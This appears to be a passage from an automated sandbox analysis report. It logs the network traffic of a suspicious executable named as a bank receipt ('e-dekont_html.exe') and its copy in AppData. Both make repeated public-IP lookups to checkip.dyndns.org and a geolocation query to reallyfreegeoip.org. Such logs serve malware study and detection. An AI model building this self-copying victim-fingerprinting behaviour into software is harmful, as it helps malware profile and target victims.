                                                                                                                                                        Nov 20, 2024 07:52:17.142674923 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:17 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: b27c5b87a98960cba6309f9b9b94b0c6
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                        Nov 20, 2024 07:52:17.151498079 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:18.188131094 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: d88087268bb27347e8ad913dcf9db885
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                        Nov 20, 2024 07:52:19.308557987 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:19.414479971 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:19 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 029c26e48c17c4d3cab72497771901b1
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449743193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:17.297436953 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:18.846545935 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: ae9e7c5fc37e2652a9b92663b1531d71
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449747193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:19.524987936 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:20.009561062 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:19 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: c26ae82502013e7043f6b9418388a762
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449749193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:20.086951971 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Nov 20, 2024 07:52:20.587681055 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:20 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 59e9ba3cb43a81716b2a2faebe01f3d4
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449751193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:20.632050991 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:21.240581036 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:21 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 5b9392353e21a2a18a3667e365a92d3a
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449754193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:21.305669069 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:23.158598900 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:23 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: a080142ff8129e68f9b6b9e126610ac4
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449755193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:21.899164915 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:23.388186932 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:23 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: b46e480a74b1b041448389b7d4d2ac58
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449762193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:23.788970947 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:25.552380085 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:25 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: caa41d2b43be7afe747952be38a03c53
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449763193.122.130.0807308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:24.076741934 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:25.731915951 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:25 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: aecde076e1429a07a64731cf10ffba08
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.461281193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:26.159900904 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:26.906852961 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:26 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: 65e05123837ba879d3590c2a43281ca2
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.461284193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:27.593836069 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:29.172739983 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:29 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: b1d0f39ff52a0bd337d1aea90ffec250
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.461286193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:29.786780119 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:30.439938068 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:30 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: d96bf50d41e186d8e9db5e98bc1fc7fc
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.461288193.122.130.0807696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Nov 20, 2024 07:52:31.087949038 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Nov 20, 2024 07:52:31.563946009 CET320INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:31 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 103
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Request-ID: deaa5078d9e27a539eb1f5b1702f078f
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449735188.114.97.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:13 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:13 UTC854INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:13 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49442
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uj6ghEzOXkb4tUDRtcAW%2F1S0fUVbxt0Vu9iOn0nkqJLFW8OyIRORvMxJPMHSnkQiWM2uTs%2FTOoTPSKGAMu4N8xDbPNqmgPayNDK73Mk7Xx6Eu91QPi%2Fg%2BTihzK19R%2BcSAYiXBUYU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e568417acecc40c-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1720683&cwnd=219&unsent_bytes=0&cid=43b3db02c82498e3&ts=268&x=0"
                                                                                                                                                        2024-11-20 06:52:13 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449737188.114.97.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:14 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:14 UTC854INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:14 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49443
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRftJ3pLn27RJLLFPhSD7vy9bOpc7PyKla%2Ffs13OfcE2eGmzaAJ7pqDXVxEuur4Yi8XbFX2tUxzb9TDofWg%2Fo%2FUYh0DasM71vsLh%2ByKAzG2jFUgVUxmswfTV%2F4p9JR9NJRWPY7d7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56841c9a404345-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1796923&cwnd=211&unsent_bytes=0&cid=509bf9aa2181e81c&ts=136&x=0"
